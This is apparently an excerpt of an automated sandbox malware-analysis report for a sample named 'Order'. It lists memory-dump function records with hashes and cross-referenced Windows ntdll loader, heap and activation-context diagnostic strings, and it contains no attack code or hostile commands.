                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                • API String ID: 0-204845295
                                                                Strings
                                                                • Unable to build import redirection Table, Status = 0x%x, xrefs: 01A381E5
                                                                • minkernel\ntdll\ldrinit.c, xrefs: 019FC6C3
                                                                • LdrpInitializeImportRedirection, xrefs: 01A38177, 01A381EB
                                                                • LdrpInitializeProcess, xrefs: 019FC6C4
                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01A38181, 01A381F5
                                                                • Loading import redirection DLL: '%wZ', xrefs: 01A38170
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                • API String ID: 0-475462383
                                                                Strings
                                                                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 01A3219F
                                                                • RtlGetAssemblyStorageRoot, xrefs: 01A32160, 01A3219A, 01A321BA
                                                                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01A32178
                                                                • SXS: %s() passed the empty activation context, xrefs: 01A32165
                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 01A321BF
                                                                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01A32180
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                • API String ID: 0-861424205
                                                                • Opcode ID: 57f9e2368cf5f72ecec46df63d4cde83588a3a8b78151282f6406af84baef4e4
                                                                • Instruction ID: 7537a82a8e131cad78672f7e74f2294a54b8d3dd5dd4ed9adf742d8944018fbc
                                                                • Opcode Fuzzy Hash: 57f9e2368cf5f72ecec46df63d4cde83588a3a8b78151282f6406af84baef4e4
                                                                • Instruction Fuzzy Hash: FA31C436B413257BE7219B9A8D82F6A7A78DBE5A50F05405EFB08A7240D270EE00C7E1
                                                                APIs
                                                                  • Part of subcall function 01A02DF0: LdrInitializeThunk.NTDLL ref: 01A02DFA
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A00BA3
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A00BB6
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A00D60
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A00D74
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                • String ID:
                                                                • API String ID: 1404860816-0
                                                                • Opcode ID: 610695840dfd13e3c01f076459ff11508a2563a38d24598d81baa8dc13328128
                                                                • Instruction ID: db3a4559c10a9ebeebf455f9517d55dfa66de6f5dc11ee3e399df6094bbeb9c4
                                                                • Opcode Fuzzy Hash: 610695840dfd13e3c01f076459ff11508a2563a38d24598d81baa8dc13328128
                                                                • Instruction Fuzzy Hash: 12427D71900705DFDB62CF28C980BAAB7F4FF44314F1445AAE989EB281D770AA85CF61
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                • API String ID: 0-379654539
                                                                • Opcode ID: 5f4213737beb19907425def169131bb7d07df1b3f4e7ddd5446f0d5ea3aa1552
                                                                • Instruction ID: 20205a103b5c0069b51e32b7d90af523722215402ddd40cfba7d4d7a59dd23dd
                                                                • Opcode Fuzzy Hash: 5f4213737beb19907425def169131bb7d07df1b3f4e7ddd5446f0d5ea3aa1552
                                                                • Instruction Fuzzy Hash: FDC17B7420838A8FD711CF58C544B6AB7E4BF94B04F04896EF9DA8B291E734CA49CB57
                                                                Strings
                                                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 019F855E
                                                                • LdrpInitializeProcess, xrefs: 019F8422
                                                                • minkernel\ntdll\ldrinit.c, xrefs: 019F8421
                                                                • @, xrefs: 019F8591
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                • API String ID: 0-1918872054
                                                                • Opcode ID: dec65d88095baff68f5be4cc909d8bf04d51ac8c60f230b22ee782849beb534d
                                                                • Instruction ID: ed92cff31b89cc0467932bd0e709511f1b17b014bf5ab90d5ab15856e4038679
                                                                • Opcode Fuzzy Hash: dec65d88095baff68f5be4cc909d8bf04d51ac8c60f230b22ee782849beb534d
                                                                • Instruction Fuzzy Hash: 6D917C71548345BFEB22EF65CD44FABBAECBF84754F40092EFA8892151E334D9048B62
                                                                Strings
                                                                • .Local, xrefs: 019F28D8
                                                                • SXS: %s() passed the empty activation context, xrefs: 01A321DE
                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 01A322B6
                                                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 01A321D9, 01A322B1
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                • API String ID: 0-1239276146
                                                                • Opcode ID: 6a2ff2937e57994fe0f14c036f7dd6680aafe0f103af1adf73106dcf7be79061
                                                                • Instruction ID: 0a835d62205f6330645d97c81e1b311a562a0da3d1edc5d4c81fd69bfd3093cb
                                                                • Opcode Fuzzy Hash: 6a2ff2937e57994fe0f14c036f7dd6680aafe0f103af1adf73106dcf7be79061
                                                                • Instruction Fuzzy Hash: DCA19031901229ABDB24CF98CD84BA9B7B4BF58314F2441EAEA08A7251D730DEC0CF90
                                                                Strings
                                                                • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01A33437
                                                                • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01A33456
                                                                • RtlDeactivateActivationContext, xrefs: 01A33425, 01A33432, 01A33451
                                                                • SXS: %s() called with invalid flags 0x%08lx, xrefs: 01A3342A
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                • API String ID: 0-1245972979
                                                                • Opcode ID: bfa44b4a4e880013c32fcfad92217210373a14ac9cdbf4abf34cd02e4cf61508
                                                                • Instruction ID: 243f131d549013cc928f6d38c37f8bbb8b56fba587fe89f5fcedb9d55659ea35
                                                                • Opcode Fuzzy Hash: bfa44b4a4e880013c32fcfad92217210373a14ac9cdbf4abf34cd02e4cf61508
                                                                • Instruction Fuzzy Hash: DE610336614712ABDB22CF1DC841B2AB7E5BFC0B62F15851DFA599B242D730E801CBD1
                                                                Strings
                                                                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01A21028
                                                                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01A210AE
                                                                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01A20FE5
                                                                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01A2106B
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                • API String ID: 0-1468400865
                                                                • Opcode ID: cb698fd463fb65de3ba605b3aa83a0a811e770ad98a33caf913854a49f8699c2
                                                                • Instruction ID: cf49ea2d26edbecb69802858c6491c824447e7d6ddf633d60824269772b05e78
                                                                • Opcode Fuzzy Hash: cb698fd463fb65de3ba605b3aa83a0a811e770ad98a33caf913854a49f8699c2
                                                                • Instruction Fuzzy Hash: BA71B1719043459FCB21DF18C984F977FA8AFA4B64F50046CF9888B286D734D589CBD2
                                                                Strings
                                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 01A2A992
                                                                • LdrpDynamicShimModule, xrefs: 01A2A998
                                                                • apphelp.dll, xrefs: 019E2462
                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01A2A9A2
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                • API String ID: 0-176724104
                                                                • Opcode ID: 4a64d344f78d25da48886b3695f275dc725f06ffeede359f17abadda08537335
                                                                • Instruction ID: 29b56b4b114a4cf3a382bacf34119c5c1c4795421b293cfef1463fe9301a6483
                                                                • Opcode Fuzzy Hash: 4a64d344f78d25da48886b3695f275dc725f06ffeede359f17abadda08537335
                                                                • Instruction Fuzzy Hash: F0316D7AB00251ABDB32DF9ED8C5E6A77B9FFC4B00F150419F905A7256D7706982C780
                                                                Strings
                                                                • HEAP: , xrefs: 019D3264
                                                                • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 019D327D
                                                                • HEAP[%wZ]: , xrefs: 019D3255
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                • API String ID: 0-617086771
                                                                • Opcode ID: e39f23a793178a41de65abd7177f57e9e7eded70c7dddb97ff36674a23235664
                                                                • Instruction ID: 494d24020a688c57a50c2ca3789ae33d2691f9e4d6e9f1da675266b7669fc67e
                                                                • Opcode Fuzzy Hash: e39f23a793178a41de65abd7177f57e9e7eded70c7dddb97ff36674a23235664
                                                                • Instruction Fuzzy Hash: 2492CC71A042499FDB25CF68C440BAEBBF5FF48301F18C499E959AB392D734AA41CF51
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                • API String ID: 0-4253913091
                                                                • Opcode ID: 960fd715935bfb38d5aacd6b55f706996eb0c419d2b4b622204f0850904ac7e1
                                                                • Instruction ID: fb8f169dad767b8a0cb5bd7f53441ebcc2ca7a25fad8f703e26dd47d4a553ee4
                                                                • Opcode Fuzzy Hash: 960fd715935bfb38d5aacd6b55f706996eb0c419d2b4b622204f0850904ac7e1
                                                                • Instruction Fuzzy Hash: 10F1BC70A00606DFEB25DF6CC984FAAB7B5FF45304F188168E51A9B392D734E981CB91
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $@
                                                                • API String ID: 0-1077428164
                                                                • Opcode ID: 607451c12ca255099924a64f608d7bdaa4c2ef0bfe2fd90cd56cfe517ebd9023
                                                                • Instruction ID: 3e4fbe2807b6f57ae43b1f67b5670114958cba57961209e31c1bbb68e7b301df
                                                                • Opcode Fuzzy Hash: 607451c12ca255099924a64f608d7bdaa4c2ef0bfe2fd90cd56cfe517ebd9023
                                                                • Instruction Fuzzy Hash: D2C280716083519FDB2ACF68C884BABBBE5AF88754F04892DE98DC7241D734D845CB93
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: FilterFullPath$UseFilter$\??\
                                                                • API String ID: 0-2779062949
                                                                • Opcode ID: ec5831c4e9d3e9201571ba2db397ffc9d80fb866b7c68be1a29d14f129df288e
                                                                • Instruction ID: ccb605129c3fb1139c2ac65e5f7fafcf51a8ece649d3018d162563b04aaa1a8c
                                                                • Opcode Fuzzy Hash: ec5831c4e9d3e9201571ba2db397ffc9d80fb866b7c68be1a29d14f129df288e
                                                                • Instruction Fuzzy Hash: 74A17B759516299BDB31EF68CC88BEAB7B8EF48710F0001EAE90CA7254D7359E84CF50
                                                                Strings
                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01A2A121
                                                                • Failed to allocated memory for shimmed module list, xrefs: 01A2A10F
                                                                • LdrpCheckModule, xrefs: 01A2A117
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                • API String ID: 0-161242083
                                                                • Opcode ID: d3a6c31f93532b93ed95ee91b00efe0fccbac90e482d9eec9fa103acbacc89e3
                                                                • Instruction ID: 77ae6dc4c3ef1a4ae0aab7802fc19d2a2947c0aa5ab6a03d9c714508ddcc045f
                                                                • Opcode Fuzzy Hash: d3a6c31f93532b93ed95ee91b00efe0fccbac90e482d9eec9fa103acbacc89e3
                                                                • Instruction Fuzzy Hash: 1671C074E00205DFDB26DFACC984AAEB7F5FB88704F18442DE90AE7652D774A942CB50
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                • API String ID: 0-1334570610
                                                                • Opcode ID: 1fab86c11b3230a7bd94d38cdbf350e5649ef8e191bca7fb3234051befbae92b
                                                                • Instruction ID: 331df2ae0b90d322f2efa599a06d31ac53f8f64a1381f4df0d473566c6c89de1
                                                                • Opcode Fuzzy Hash: 1fab86c11b3230a7bd94d38cdbf350e5649ef8e191bca7fb3234051befbae92b
                                                                • Instruction Fuzzy Hash: 4E61C030A04301DFEB29CF28C584BAABBE5FF45704F18C559E4998F292D774E881CB91
                                                                Strings
                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01A382E8
                                                                • Failed to reallocate the system dirs string !, xrefs: 01A382D7
                                                                • LdrpInitializePerUserWindowsDirectory, xrefs: 01A382DE
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                • API String ID: 0-1783798831
                                                                • Opcode ID: f0232c1cbb49dd5b08f719108fdffec12f2aa318ccc8e9649c22e9be7ec5a32a
                                                                • Instruction ID: d5e7bc19a5e2b5aa574ac5ae834d7c86faeaab756ec2484395c7620625874312
                                                                • Opcode Fuzzy Hash: f0232c1cbb49dd5b08f719108fdffec12f2aa318ccc8e9649c22e9be7ec5a32a
                                                                • Instruction Fuzzy Hash: F641E1B5504345ABDB21EB68D984F5B77E8EF84750F00892EFA4CD32A2E774D8018B91
                                                                Strings
                                                                • @, xrefs: 01A7C1F1
                                                                • PreferredUILanguages, xrefs: 01A7C212
                                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 01A7C1C5
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                • API String ID: 0-2968386058
                                                                • Opcode ID: 440693d7e4a89c2c0a18f4d0e964d1b3f3a0b619976bbe872bb0d4cde2e599c4
                                                                • Instruction ID: 04a9232a5dae39f91e90024bad4b63b9daeab7059fc7bbf579b96edf21437f5b
                                                                • Opcode Fuzzy Hash: 440693d7e4a89c2c0a18f4d0e964d1b3f3a0b619976bbe872bb0d4cde2e599c4
                                                                • Instruction Fuzzy Hash: D1416471D0020AEBDB11EFD8CC55BEEB7B8AB54714F14406AE609F7284E7749B448B90
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                • API String ID: 0-1373925480
                                                                • Opcode ID: 56299fcb6c11285557ce84c705ed0ed9ff180a0aee89dd1648e42d7fdaa5fec2
                                                                • Instruction ID: 3215c5e31ab71d4e047b34308684a7aeeea44dbe4b9e62985fc7d9a6095883c9
                                                                • Opcode Fuzzy Hash: 56299fcb6c11285557ce84c705ed0ed9ff180a0aee89dd1648e42d7fdaa5fec2
                                                                • Instruction Fuzzy Hash: 08414771A087588BEB26DBD9C944BADBBF4FF99380F14005ADD05EB381E7348981CB51
                                                                Strings
                                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01A44888
                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01A44899
                                                                • LdrpCheckRedirection, xrefs: 01A4488F
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                • API String ID: 0-3154609507
                                                                • Opcode ID: 0bddbd1c7723b96c58115eb10722aed6aa17eea0feaecc59fdc784326be7f911
                                                                • Instruction ID: 3a17d177ecc2c47ded605573a816b5f0ff13dba7896eeb0aafde3e0fba5187b3
                                                                • Opcode Fuzzy Hash: 0bddbd1c7723b96c58115eb10722aed6aa17eea0feaecc59fdc784326be7f911
                                                                • Instruction Fuzzy Hash: 8841AF72A047919BEB22CF6CD941B667BE4AFCDA50F190569ED48A7212E730D801CB91
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                • API String ID: 0-2558761708
                                                                • Opcode ID: 0f0cad0682398b2912e813f8b1fba49fe4ed93b463cfa47e7c75d9576d002bf9
                                                                • Instruction ID: 9b0a22c22bdd872f6502125ae9f1799be72eb3827a8179c4d81eb5a87ab3a0b0
                                                                • Opcode Fuzzy Hash: 0f0cad0682398b2912e813f8b1fba49fe4ed93b463cfa47e7c75d9576d002bf9
                                                                • Instruction Fuzzy Hash: 6E11DF317181529FEB29CA1DC884FBAF7A6FF8062AF188159F40ACB292DB34D841C750
                                                                Strings
                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01A42104
                                                                • Process initialization failed with status 0x%08lx, xrefs: 01A420F3
                                                                • LdrpInitializationFailure, xrefs: 01A420FA
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                • API String ID: 0-2986994758
                                                                • Opcode ID: 71e7cbd1dd22e9de96be903969ce0020fb7365d40ecfa3dc58f7f43e9c8d474d
                                                                • Instruction ID: a8e21f2f927a2a47cf0d54a5acc25356e3e96c28f612aa2f6f79c6824ae2fc00
                                                                • Opcode Fuzzy Hash: 71e7cbd1dd22e9de96be903969ce0020fb7365d40ecfa3dc58f7f43e9c8d474d
                                                                • Instruction Fuzzy Hash: FDF0FC356403487BEB24D74CDD46F957768FBC4B54F500069F70477281D1F0A945C691
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: #%u
                                                                • API String ID: 48624451-232158463
                                                                • Opcode ID: ba6036c53deec1976a2ec9d9c093c22c341685c8361b276c2f0998a83628f71b
                                                                • Instruction ID: 6b5bb7cc6cb0ce8b02857efdfd93bfb713d3cbe4dfd6ee56169221ba1413cd87
                                                                • Opcode Fuzzy Hash: ba6036c53deec1976a2ec9d9c093c22c341685c8361b276c2f0998a83628f71b
                                                                • Instruction Fuzzy Hash: 6B7159B1A0014A9FDB01DFA8C990FAEBBF8FF58704F144065E905E7251EA74EE05CBA1
                                                                Strings
                                                                • LdrResSearchResource Enter, xrefs: 019CAA13
                                                                • LdrResSearchResource Exit, xrefs: 019CAA25
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                • API String ID: 0-4066393604
                                                                • Opcode ID: a60e87a9e081a0ef66e426b9c518d083d0b1132df8410e77569a3342cc0c5dd2
                                                                • Instruction ID: 6bec9b9bc394089ee13592f969a41ab15ef8954927d00ab98457b37e0486713c
                                                                • Opcode Fuzzy Hash: a60e87a9e081a0ef66e426b9c518d083d0b1132df8410e77569a3342cc0c5dd2
                                                                • Instruction Fuzzy Hash: C0E1A271E0421D9FEF22CF9DC940BAEBBBABF49750F14442AE945E7241E7389940CB51
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: `$`
                                                                • API String ID: 0-197956300
                                                                • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                • Instruction ID: 7a0cea0dc5a66d6036798dd3bdda28ea0472c823189d47b18c12550c3928bf6d
                                                                • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                • Instruction Fuzzy Hash: A0C1CF312043429BEB25EF28C841B6BBBE5AFC4318F084A2EF696CB291D778D545CB51
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID: Legacy$UEFI
                                                                • API String ID: 2994545307-634100481
                                                                • Opcode ID: 9fc6bd995607e78b43e9d0afd65e7739ea84adfd7492b2b155d1803f35244f82
                                                                • Instruction ID: 7f71d8067389061673f5a8f4a7a7b972bf7aa8f37ca5f2cb1c127fcfc66437aa
                                                                • Opcode Fuzzy Hash: 9fc6bd995607e78b43e9d0afd65e7739ea84adfd7492b2b155d1803f35244f82
                                                                • Instruction Fuzzy Hash: B4613871E003199FDB26DFA9C940BAEBBF9FB88700F14406DE649EB291D731A940CB50
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @$MUI
                                                                • API String ID: 0-17815947
                                                                • Opcode ID: 88a0d45a1cd784817eb534a05298615686172c43aacf829fa88fa30eea899040
                                                                • Instruction ID: 3f8f1eb0d055d4cf7310bb183c45a5f6decabd00058bfdad9ccac46ee22398a9
                                                                • Opcode Fuzzy Hash: 88a0d45a1cd784817eb534a05298615686172c43aacf829fa88fa30eea899040
                                                                • Instruction Fuzzy Hash: 6B512AB1D0021DAFEF11DFA9CD84AEEBBBCEB48754F10052AE615B7290D6309E05CB60
                                                                Strings
                                                                • kLsE, xrefs: 019C0540
